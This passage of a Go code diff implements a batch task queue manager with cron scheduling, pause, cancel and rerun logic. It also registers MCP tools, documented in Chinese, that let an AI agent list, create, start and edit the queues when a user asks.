&taskRow.CompletedAt.Time + } + if taskRow.Error.Valid { + task.Error = taskRow.Error.String + } + if taskRow.Result.Valid { + task.Result = taskRow.Result.String + } + queue.Tasks = append(queue.Tasks, task) + } + + m.queues[queueRow.ID] = queue + } + + return nil +} + +// UpdateTaskStatus 更新任务状态 +func (m *BatchTaskManager) UpdateTaskStatus(queueID, taskID, status string, result, errorMsg string) { + m.UpdateTaskStatusWithConversationID(queueID, taskID, status, result, errorMsg, "") +} + +// UpdateTaskStatusWithConversationID 更新任务状态(包含conversationId) +func (m *BatchTaskManager) UpdateTaskStatusWithConversationID(queueID, taskID, status string, result, errorMsg, conversationID string) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + + // DB 优先:先持久化,成功后再更新内存,避免重启后状态不一致 + if m.db != nil { + if err := m.db.UpdateBatchTaskStatus(queueID, taskID, status, conversationID, result, errorMsg); err != nil { + m.logger.Warn("batch task DB status update failed, skipping memory update", + zap.String("queueId", queueID), zap.String("taskId", taskID), zap.Error(err)) + return + } + } + + for _, task := range queue.Tasks { + if task.ID == taskID { + task.Status = status + if result != "" { + task.Result = result + } + if errorMsg != "" { + task.Error = errorMsg + } + if conversationID != "" { + task.ConversationID = conversationID + } + now := time.Now() + if status == BatchTaskStatusRunning && task.StartedAt == nil { + task.StartedAt = &now + } + if status == BatchTaskStatusCompleted || status == BatchTaskStatusFailed || status == BatchTaskStatusCancelled { + task.CompletedAt = &now + } + break + } + } +} + +// UpdateQueueStatus 更新队列状态 +func (m *BatchTaskManager) UpdateQueueStatus(queueID, status string) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + + // DB 优先:先持久化,成功后再更新内存 + if m.db != nil { + if err := m.db.UpdateBatchQueueStatus(queueID, status); err != nil { + m.logger.Warn("batch queue DB status update failed, skipping memory update", + zap.String("queueId", queueID), zap.Error(err)) + return + } + } + + queue.Status = status + now := time.Now() + if status == BatchQueueStatusRunning && queue.StartedAt == nil { + queue.StartedAt = &now + } + if status == BatchQueueStatusCompleted || status == BatchQueueStatusCancelled { + queue.CompletedAt = &now + } +} + +// UpdateQueueSchedule 更新队列调度配置 +func (m *BatchTaskManager) UpdateQueueSchedule(queueID, scheduleMode, cronExpr string, nextRunAt *time.Time) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + + queue.ScheduleMode = normalizeBatchQueueScheduleMode(scheduleMode) + if queue.ScheduleMode == "cron" { + queue.CronExpr = strings.TrimSpace(cronExpr) + queue.NextRunAt = nextRunAt + } else { + queue.CronExpr = "" + queue.NextRunAt = nil + } + + if m.db != nil { + if err := m.db.UpdateBatchQueueSchedule(queueID, queue.ScheduleMode, queue.CronExpr, queue.NextRunAt); err != nil { + m.logger.Warn("batch queue DB schedule update failed", zap.String("queueId", queueID), zap.Error(err)) + } + } +} + +// UpdateQueueMetadata 更新队列标题、角色和代理模式(非 running 时可用) +func (m *BatchTaskManager) UpdateQueueMetadata(queueID, title, role, agentMode string) error { + if utf8.RuneCountInString(title) > MaxBatchQueueTitleLen { + return fmt.Errorf("标题不能超过 %d 个字符", MaxBatchQueueTitleLen) + } + if utf8.RuneCountInString(role) > MaxBatchQueueRoleLen { + return fmt.Errorf("角色名不能超过 %d 个字符", MaxBatchQueueRoleLen) + } + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return fmt.Errorf("队列不存在") + } + if queue.Status == BatchQueueStatusRunning { + return fmt.Errorf("队列正在运行中,无法修改") + } + + // 如果未传 agentMode,保留原值 + if strings.TrimSpace(agentMode) != "" { + agentMode = config.NormalizeAgentMode(agentMode) + } else { + agentMode = queue.AgentMode + } + + queue.Title = title + queue.Role = role + queue.AgentMode = agentMode + + if m.db != nil { + if err := m.db.UpdateBatchQueueMetadata(queueID, title, role, agentMode); err != nil { + m.logger.Warn("batch queue DB metadata update failed", zap.String("queueId", queueID), zap.Error(err)) + } + } + return nil +} + +// SetScheduleEnabled 暂停/恢复 Cron 自动调度(不影响手工执行) +func (m *BatchTaskManager) SetScheduleEnabled(queueID string, enabled bool) bool { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return false + } + queue.ScheduleEnabled = enabled + if m.db != nil { + _ = m.db.UpdateBatchQueueScheduleEnabled(queueID, enabled) + } + return true +} + +// RecordScheduledRunStart Cron 触发成功、即将执行子任务时调用 +func (m *BatchTaskManager) RecordScheduledRunStart(queueID string) { + now := time.Now() + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + queue.LastScheduleTriggerAt = &now + queue.LastScheduleError = "" + if m.db != nil { + _ = m.db.RecordBatchQueueScheduledTriggerStart(queueID, now) + } +} + +// SetLastScheduleError 调度层失败(未成功开始执行) +func (m *BatchTaskManager) SetLastScheduleError(queueID, msg string) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + queue.LastScheduleError = strings.TrimSpace(msg) + if m.db != nil { + _ = m.db.SetBatchQueueLastScheduleError(queueID, queue.LastScheduleError) + } +} + +// SetLastRunError 最近一轮批量执行中的失败摘要 +func (m *BatchTaskManager) SetLastRunError(queueID, msg string) { + msg = strings.TrimSpace(msg) + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + queue.LastRunError = msg + if m.db != nil { + _ = m.db.SetBatchQueueLastRunError(queueID, msg) + } +} + +// ResetQueueForRerun 重置队列与子任务状态,供 cron 下一轮执行 +func (m *BatchTaskManager) ResetQueueForRerun(queueID string) bool { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return false + } + + // DB 优先:先持久化重置,成功后再更新内存,避免 DB 失败导致内存脏状态 + if m.db != nil { + if err := m.db.ResetBatchQueueForRerun(queueID); err != nil { + m.logger.Warn("batch queue DB reset for rerun failed, skipping memory update", + zap.String("queueId", queueID), zap.Error(err)) + return false + } + } + + queue.Status = BatchQueueStatusPending + queue.CurrentIndex = 0 + queue.StartedAt = nil + queue.CompletedAt = nil + queue.NextRunAt = nil + queue.LastRunError = "" + queue.LastScheduleError = "" + for _, task := range queue.Tasks { + task.Status = BatchTaskStatusPending + task.ConversationID = "" + task.StartedAt = nil + task.CompletedAt = nil + task.Error = "" + task.Result = "" + } + return true +} + +// UpdateTaskMessage 更新任务消息(队列空闲时可改;任务需非 running) +func (m *BatchTaskManager) UpdateTaskMessage(queueID, taskID, message string) error { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return fmt.Errorf("队列不存在") + } + + if !queueAllowsTaskListMutationLocked(queue) { + return fmt.Errorf("队列正在执行或未就绪,无法编辑任务") + } + + // 查找并更新任务 + for _, task := range queue.Tasks { + if task.ID == taskID { + if task.Status == BatchTaskStatusRunning { + return fmt.Errorf("执行中的任务不能编辑") + } + task.Message = message + + // 同步到数据库 + if m.db != nil { + if err := m.db.UpdateBatchTaskMessage(queueID, taskID, message); err != nil { + return fmt.Errorf("更新任务消息失败: %w", err) + } + } + return nil + } + } + + return fmt.Errorf("任务不存在") +} + +// AddTaskToQueue 添加任务到队列(队列空闲时可添加:含 cron 本轮 completed、手动暂停后等) +func (m *BatchTaskManager) AddTaskToQueue(queueID, message string) (*BatchTask, error) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return nil, fmt.Errorf("队列不存在") + } + + if !queueAllowsTaskListMutationLocked(queue) { + return nil, fmt.Errorf("队列正在执行或未就绪,无法添加任务") + } + + if message == "" { + return nil, fmt.Errorf("任务消息不能为空") + } + + // 生成任务ID + taskID := generateShortID() + task := &BatchTask{ + ID: taskID, + Message: message, + Status: BatchTaskStatusPending, + } + + // 添加到内存队列 + queue.Tasks = append(queue.Tasks, task) + + // 同步到数据库 + if m.db != nil { + if err := m.db.AddBatchTask(queueID, taskID, message); err != nil { + // 如果数据库保存失败,从内存中移除 + queue.Tasks = queue.Tasks[:len(queue.Tasks)-1] + return nil, fmt.Errorf("添加任务失败: %w", err) + } + } + + return task, nil +} + +// DeleteTask 删除任务(队列空闲时可删;执行中任务不可删) +func (m *BatchTaskManager) DeleteTask(queueID, taskID string) error { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return fmt.Errorf("队列不存在") + } + + if !queueAllowsTaskListMutationLocked(queue) { + return fmt.Errorf("队列正在执行或未就绪,无法删除任务") + } + + // 查找任务 + taskIndex := -1 + for i, task := range queue.Tasks { + if task.ID == taskID { + if task.Status == BatchTaskStatusRunning { + return fmt.Errorf("执行中的任务不能删除") + } + taskIndex = i + break + } + } + + if taskIndex == -1 { + return fmt.Errorf("任务不存在") + } + + // DB 优先:先从数据库删除,成功后再从内存移除 + if m.db != nil { + if err := m.db.DeleteBatchTask(queueID, taskID); err != nil { + return fmt.Errorf("删除任务失败: %w", err) + } + } + + queue.Tasks = append(queue.Tasks[:taskIndex], queue.Tasks[taskIndex+1:]...) + return nil +} + +func queueHasRunningTaskLocked(queue *BatchTaskQueue) bool { + if queue == nil { + return false + } + for _, t := range queue.Tasks { + if t != nil && t.Status == BatchTaskStatusRunning { + return true + } + } + return false +} + +// queueAllowsTaskListMutationLocked 是否允许增删改子任务文案/列表(必须在持有 BatchTaskManager.mu 下调用) +func queueAllowsTaskListMutationLocked(queue *BatchTaskQueue) bool { + if queue == nil { + return false + } + if queue.Status == BatchQueueStatusRunning { + return false + } + if queueHasRunningTaskLocked(queue) { + return false + } + switch queue.Status { + case BatchQueueStatusPending, BatchQueueStatusPaused, BatchQueueStatusCompleted, BatchQueueStatusCancelled: + return true + default: + return false + } +} + +// GetNextTask 获取下一个待执行的任务 +func (m *BatchTaskManager) GetNextTask(queueID string) (*BatchTask, bool) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return nil, false + } + + for i := queue.CurrentIndex; i < len(queue.Tasks); i++ { + task := queue.Tasks[i] + if task.Status == BatchTaskStatusPending { + queue.CurrentIndex = i + return task, true + } + } + + return nil, false +} + +// MoveToNextTask 移动到下一个任务 +func (m *BatchTaskManager) MoveToNextTask(queueID string) { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return + } + + queue.CurrentIndex++ + + // 同步到数据库 + if m.db != nil { + if err := m.db.UpdateBatchQueueCurrentIndex(queueID, queue.CurrentIndex); err != nil { + m.logger.Warn("batch queue DB index update failed", zap.String("queueId", queueID), zap.Error(err)) + } + } +} + +// SetTaskCancel 设置当前任务的取消函数 +func (m *BatchTaskManager) SetTaskCancel(queueID string, cancel context.CancelFunc) { + m.mu.Lock() + defer m.mu.Unlock() + if cancel != nil { + m.taskCancels[queueID] = cancel + } else { + delete(m.taskCancels, queueID) + } +} + +// PauseQueue 暂停队列 +func (m *BatchTaskManager) PauseQueue(queueID string) bool { + var cancelFunc context.CancelFunc + + m.mu.Lock() + queue, exists := m.queues[queueID] + if !exists { + m.mu.Unlock() + return false + } + + if queue.Status != BatchQueueStatusRunning { + m.mu.Unlock() + return false + } + + // DB 优先:先持久化,成功后再更新内存 + if m.db != nil { + if err := m.db.UpdateBatchQueueStatus(queueID, BatchQueueStatusPaused); err != nil { + m.logger.Warn("batch queue DB pause update failed, skipping memory update", + zap.String("queueId", queueID), zap.Error(err)) + m.mu.Unlock() + return false + } + } + + queue.Status = BatchQueueStatusPaused + + // 取消当前正在执行的任务(通过取消context) + if cancel, ok := m.taskCancels[queueID]; ok { + cancelFunc = cancel + delete(m.taskCancels, queueID) + } + m.mu.Unlock() + + // 释放锁后执行取消回调(cancel 可能阻塞,不应持锁) + if cancelFunc != nil { + cancelFunc() + } + + return true +} + +// CancelQueue 取消队列(保留此方法以保持向后兼容,但建议使用PauseQueue) +func (m *BatchTaskManager) CancelQueue(queueID string) bool { + now := time.Now() + var cancelFunc context.CancelFunc + + m.mu.Lock() + queue, exists := m.queues[queueID] + if !exists { + m.mu.Unlock() + return false + } + + if queue.Status == BatchQueueStatusCompleted || queue.Status == BatchQueueStatusCancelled { + m.mu.Unlock() + return false + } + + // DB 优先:先持久化,成功后再更新内存 + if m.db != nil { + if err := m.db.CancelPendingBatchTasks(queueID, now); err != nil { + m.logger.Warn("batch task DB batch cancel failed, skipping memory update", + zap.String("queueId", queueID), zap.Error(err)) + m.mu.Unlock() + return false + } + if err := m.db.UpdateBatchQueueStatus(queueID, BatchQueueStatusCancelled); err != nil { + m.logger.Warn("batch queue DB cancel update failed, skipping memory update", + zap.String("queueId", queueID), zap.Error(err)) + m.mu.Unlock() + return false + } + } + + queue.Status = BatchQueueStatusCancelled + queue.CompletedAt = &now + + // 内存中批量标记所有 pending 任务为 cancelled + for _, task := range queue.Tasks { + if task.Status == BatchTaskStatusPending { + task.Status = BatchTaskStatusCancelled + task.CompletedAt = &now + } + } + + // 取消当前正在执行的任务 + if cancel, ok := m.taskCancels[queueID]; ok { + cancelFunc = cancel + delete(m.taskCancels, queueID) + } + m.mu.Unlock() + + // 释放锁后执行取消回调(cancel 可能阻塞,不应持锁) + if cancelFunc != nil { + cancelFunc() + } + + return true +} + +// DeleteQueue 删除队列(运行中的队列不允许删除) +func (m *BatchTaskManager) DeleteQueue(queueID string) bool { + m.mu.Lock() + defer m.mu.Unlock() + + queue, exists := m.queues[queueID] + if !exists { + return false + } + + // 运行中的队列不允许删除,防止孤儿协程和数据丢失 + if queue.Status == BatchQueueStatusRunning { + return false + } + + // 清理取消函数 + delete(m.taskCancels, queueID) + + // 从数据库删除 + if m.db != nil { + if err := m.db.DeleteBatchQueue(queueID); err != nil { + m.logger.Warn("batch queue DB delete failed", zap.String("queueId", queueID), zap.Error(err)) + } + } + + delete(m.queues, queueID) + return true +} + +// generateShortID 生成短ID +func generateShortID() string { + b := make([]byte, 4) + rand.Read(b) + return time.Now().Format("150405") + "-" + hex.EncodeToString(b) +} diff --git a/internal/handler/batch_task_mcp.go b/internal/handler/batch_task_mcp.go new file mode 100644 index 00000000..bba9ece1 --- /dev/null +++ b/internal/handler/batch_task_mcp.go @@ -0,0 +1,831 @@ +package handler + +import ( + "context" + "encoding/json" + "fmt" + "strconv" + "strings" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +// RegisterBatchTaskMCPTools 注册批量任务队列相关 MCP 工具(需传入已初始化 DB 的 AgentHandler) +func RegisterBatchTaskMCPTools(mcpServer *mcp.Server, h *AgentHandler, logger *zap.Logger) { + if mcpServer == nil || h == nil || logger == nil { + return + } + + reg := func(tool mcp.Tool, fn func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error)) { + mcpServer.RegisterTool(tool, fn) + } + + // --- list --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskList, + Description: "列出批量任务队列(精简摘要,省上下文)。含队列元数据、子任务 id/status/截断后的 message、各状态计数。完整子任务(含 result/error/conversationId/时间等)请用 batch_task_get(queue_id)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确提及查看/管理批量任务、任务队列时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "列出批量任务队列", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "status": map[string]interface{}{ + "type": "string", + "description": "筛选状态:all(默认)、pending、running、paused、completed、cancelled", + "enum": []string{"all", "pending", "running", "paused", "completed", "cancelled"}, + }, + "keyword": map[string]interface{}{ + "type": "string", + "description": "按队列 ID 或标题模糊搜索", + }, + "page": map[string]interface{}{ + "type": "integer", + "description": "页码,从 1 开始,默认 1", + }, + "page_size": map[string]interface{}{ + "type": "integer", + "description": "每页条数,默认 20,最大 100", + }, + }, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + status := mcpArgString(args, "status") + if status == "" { + status = "all" + } + keyword := mcpArgString(args, "keyword") + page := int(mcpArgFloat(args, "page")) + if page <= 0 { + page = 1 + } + pageSize := int(mcpArgFloat(args, "page_size")) + if pageSize <= 0 { + pageSize = 20 + } + if pageSize > 100 { + pageSize = 100 + } + offset := (page - 1) * pageSize + if offset > 100000 { + offset = 100000 + } + queues, total, err := h.batchTaskManager.ListQueues(pageSize, offset, status, keyword) + if err != nil { + return batchMCPTextResult(fmt.Sprintf("列出队列失败: %v", err), true), nil + } + totalPages := (total + pageSize - 1) / pageSize + if totalPages == 0 { + totalPages = 1 + } + slim := make([]batchTaskQueueMCPListItem, 0, len(queues)) + for _, q := range queues { + if q == nil { + continue + } + slim = append(slim, toBatchTaskQueueMCPListItem(q)) + } + payload := map[string]interface{}{ + "queues": slim, + "total": total, + "page": page, + "page_size": pageSize, + "total_pages": totalPages, + } + logger.Info("MCP batch_task_list", zap.String("status", status), zap.Int("total", total)) + return batchMCPJSONResult(payload) + }) + + // --- get --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskGet, + Description: "根据 queue_id 获取单个批量任务队列详情(含子任务列表、Cron、调度开关与最近错误信息)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确提及查看/管理批量任务、任务队列时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "获取批量任务队列详情", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + queue, ok := h.batchTaskManager.GetBatchQueue(qid) + if !ok { + return batchMCPTextResult("队列不存在: "+qid, true), nil + } + return batchMCPJSONResult(queue) + }) + + // --- create --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskCreate, + Description: `⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求创建批量任务、任务队列时才可调用。禁止在用户未提及”批量任务””任务队列””定时任务”等关键词时自行调用。如果用户只是让你做某件事,请在当前对话中直接完成,不要自作主张创建任务队列。 + +【用途】应用内「任务管理 / 批量任务队列」:把多条彼此独立的用户指令登记成一条队列,便于在界面里查看进度、暂停/继续、定时重跑等。这是队列数据与调度入口,不是再开一个”子代理会话”替你探索当前问题。 + +【何时用】用户明确要批量排队执行、Cron 周期跑同一批指令、或需要与任务管理页面对齐时调用。需要即时追问、强依赖当前对话上下文的分析/编码,应在本对话内直接完成,不要为了”委派”而创建队列。 + +【参数】tasks(字符串数组)或 tasks_text(多行,每行一条)二选一;每项是一条将来由系统按队列顺序执行的指令文案。agent_mode:eino_single(Eino ADK 单代理,默认)、deep / plan_execute / supervisor(需系统启用多代理)。非”把主对话拆给子代理”。schedule_mode:manual(默认)或 cron;cron 须填 cron_expr(5 段,如 “0 */6 * * *”)。 + +【执行】默认创建后为 pending,不自动跑。execute_now=true 可创建后立即跑;否则之后调用 batch_task_start。Cron 自动下一轮需 schedule_enabled 为 true(可用 batch_task_schedule_enabled)。`, + ShortDescription: "任务管理:创建批量任务队列(登记多条指令,可选立即或 Cron)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "可选队列标题,便于在任务管理中识别", + }, + "role": map[string]interface{}{ + "type": "string", + "description": "队列使用的角色名,空表示默认", + }, + "tasks": map[string]interface{}{ + "type": "array", + "description": "队列中的子任务指令,每项一条独立待执行文案(与 tasks_text 二选一)", + "items": map[string]interface{}{"type": "string"}, + }, + "tasks_text": map[string]interface{}{ + "type": "string", + "description": "多行文本,每行一条子任务指令(与 tasks 二选一)", + }, + "agent_mode": map[string]interface{}{ + "type": "string", + "description": "执行模式:eino_single(Eino ADK,默认)、deep/plan_execute/supervisor(Eino 编排,需启用多代理)", + "enum": []string{"eino_single", "deep", "plan_execute", "supervisor"}, + }, + "schedule_mode": map[string]interface{}{ + "type": "string", + "description": "manual(仅手工/启动后跑)或 cron(按表达式触发)", + "enum": []string{"manual", "cron"}, + }, + "cron_expr": map[string]interface{}{ + "type": "string", + "description": "schedule_mode 为 cron 时必填。标准 5 段:分钟 小时 日 月 星期,例如 \"0 */6 * * *\"、\"30 2 * * 1-5\"", + }, + "execute_now": map[string]interface{}{ + "type": "boolean", + "description": "创建后是否立即开始执行队列,默认 false(pending,需 batch_task_start)", + }, + "project_id": map[string]interface{}{ + "type": "string", + "description": "队列内子对话绑定的项目 ID(可选,未指定时使用 config.project.default_project_id)", + }, + }, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + tasks, errMsg := batchMCPTasksFromArgs(args) + if errMsg != "" { + return batchMCPTextResult(errMsg, true), nil + } + title := mcpArgString(args, "title") + role := mcpArgString(args, "role") + agentMode := config.NormalizeAgentMode(mcpArgString(args, "agent_mode")) + scheduleMode := normalizeBatchQueueScheduleMode(mcpArgString(args, "schedule_mode")) + cronExpr := strings.TrimSpace(mcpArgString(args, "cron_expr")) + var nextRunAt *time.Time + if scheduleMode == "cron" { + if cronExpr == "" { + return batchMCPTextResult("Cron 调度模式下 cron_expr 不能为空", true), nil + } + sch, err := h.batchCronParser.Parse(cronExpr) + if err != nil { + return batchMCPTextResult("无效的 Cron 表达式: "+err.Error(), true), nil + } + n := sch.Next(time.Now()) + nextRunAt = &n + } + executeNow, ok := mcpArgBool(args, "execute_now") + if !ok { + executeNow = false + } + projectID := strings.TrimSpace(mcpArgString(args, "project_id")) + queue, createErr := h.batchTaskManager.CreateBatchQueue(title, role, agentMode, scheduleMode, cronExpr, projectID, nextRunAt, tasks) + if createErr != nil { + return batchMCPTextResult("创建队列失败: "+createErr.Error(), true), nil + } + started := false + if executeNow { + ok, err := h.startBatchQueueExecution(queue.ID, false) + if !ok { + return batchMCPTextResult("队列不存在: "+queue.ID, true), nil + } + if err != nil { + return batchMCPTextResult("创建成功但启动失败: "+err.Error(), true), nil + } + started = true + if refreshed, exists := h.batchTaskManager.GetBatchQueue(queue.ID); exists { + queue = refreshed + } + } + logger.Info("MCP batch_task_create", zap.String("queueId", queue.ID), zap.Int("taskCount", len(tasks))) + return batchMCPJSONResult(map[string]interface{}{ + "queue_id": queue.ID, + "queue": queue, + "started": started, + "execute_now": executeNow, + "reminder": func() string { + if started { + return "队列已创建并立即启动。" + } + return "队列已创建,当前为 pending。需要开始执行时请调用 MCP 工具 batch_task_start(queue_id 同上)。Cron 自动调度需 schedule_enabled 为 true,可用 batch_task_schedule_enabled。" + }(), + }) + }) + + // --- start --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskStart, + Description: `启动或继续执行批量任务队列(pending / paused)。 +与 batch_task_create 配合使用:仅创建队列不会自动执行,需调用本工具才会开始跑子任务。 + +⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求启动/继续批量任务时才可调用。不要在用户未要求时自行调用。`, + ShortDescription: "启动/继续批量任务队列(创建后需调用才会执行)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + ok, err := h.startBatchQueueExecution(qid, false) + if !ok { + return batchMCPTextResult("队列不存在: "+qid, true), nil + } + if err != nil { + return batchMCPTextResult("启动失败: "+err.Error(), true), nil + } + logger.Info("MCP batch_task_start", zap.String("queueId", qid)) + return batchMCPTextResult("已提交启动,队列将开始执行。", false), nil + }) + + // --- rerun (reset + start for completed/cancelled queues) --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskRerun, + Description: "重跑已完成或已取消的批量任务队列。会重置所有子任务状态后重新执行一轮。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求重跑批量任务时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "重跑批量任务队列", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + queue, exists := h.batchTaskManager.GetBatchQueue(qid) + if !exists { + return batchMCPTextResult("队列不存在: "+qid, true), nil + } + if queue.Status != "completed" && queue.Status != "cancelled" { + return batchMCPTextResult("仅已完成或已取消的队列可以重跑,当前状态: "+queue.Status, true), nil + } + if !h.batchTaskManager.ResetQueueForRerun(qid) { + return batchMCPTextResult("重置队列失败", true), nil + } + ok, err := h.startBatchQueueExecution(qid, false) + if !ok { + return batchMCPTextResult("启动失败", true), nil + } + if err != nil { + return batchMCPTextResult("启动失败: "+err.Error(), true), nil + } + logger.Info("MCP batch_task_rerun", zap.String("queueId", qid)) + return batchMCPTextResult("已重置并重新启动队列。", false), nil + }) + + // --- pause --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskPause, + Description: "暂停正在运行的批量任务队列(当前子任务会被取消)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求暂停批量任务时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "暂停批量任务队列", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + if !h.batchTaskManager.PauseQueue(qid) { + return batchMCPTextResult("无法暂停:队列不存在或当前非 running 状态", true), nil + } + logger.Info("MCP batch_task_pause", zap.String("queueId", qid)) + return batchMCPTextResult("队列已暂停。", false), nil + }) + + // --- delete queue --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskDelete, + Description: "删除批量任务队列及其子任务记录。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求删除批量任务队列时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "删除批量任务队列", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + if !h.batchTaskManager.DeleteQueue(qid) { + return batchMCPTextResult("删除失败:队列不存在", true), nil + } + logger.Info("MCP batch_task_delete", zap.String("queueId", qid)) + return batchMCPTextResult("队列已删除。", false), nil + }) + + // --- update metadata (title/role/agentMode) --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskUpdateMetadata, + Description: "修改批量任务队列的标题、角色和代理模式。仅在队列非 running 状态下可修改。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量任务队列属性时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "修改批量任务队列标题/角色/代理模式", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "新标题(空字符串清除标题)", + }, + "role": map[string]interface{}{ + "type": "string", + "description": "新角色名(空字符串使用默认角色)", + }, + "agent_mode": map[string]interface{}{ + "type": "string", + "description": "代理模式:eino_single、deep、plan_execute、supervisor", + "enum": []string{"eino_single", "deep", "plan_execute", "supervisor"}, + }, + }, + "required": []string{"queue_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + title := mcpArgString(args, "title") + role := mcpArgString(args, "role") + agentMode := mcpArgString(args, "agent_mode") + if err := h.batchTaskManager.UpdateQueueMetadata(qid, title, role, agentMode); err != nil { + return batchMCPTextResult(err.Error(), true), nil + } + updated, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_update_metadata", zap.String("queueId", qid)) + return batchMCPJSONResult(updated) + }) + + // --- update schedule --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskUpdateSchedule, + Description: `修改批量任务队列的调度方式和 Cron 表达式。仅在队列非 running 状态下可修改。 +schedule_mode 为 cron 时必须提供有效 cron_expr;为 manual 时会清除 Cron 配置。 + +⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量任务调度配置时才可调用。不要在用户未要求时自行调用。`, + ShortDescription: "修改批量任务调度配置(Cron 表达式)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "schedule_mode": map[string]interface{}{ + "type": "string", + "description": "manual 或 cron", + "enum": []string{"manual", "cron"}, + }, + "cron_expr": map[string]interface{}{ + "type": "string", + "description": "Cron 表达式(schedule_mode 为 cron 时必填)。标准 5 段格式:分钟 小时 日 月 星期,如 \"0 */6 * * *\"(每6小时)、\"30 2 * * 1-5\"(工作日凌晨2:30)", + }, + }, + "required": []string{"queue_id", "schedule_mode"}, + }, + }, func(ctx context.Context, args map[string]interface{}) 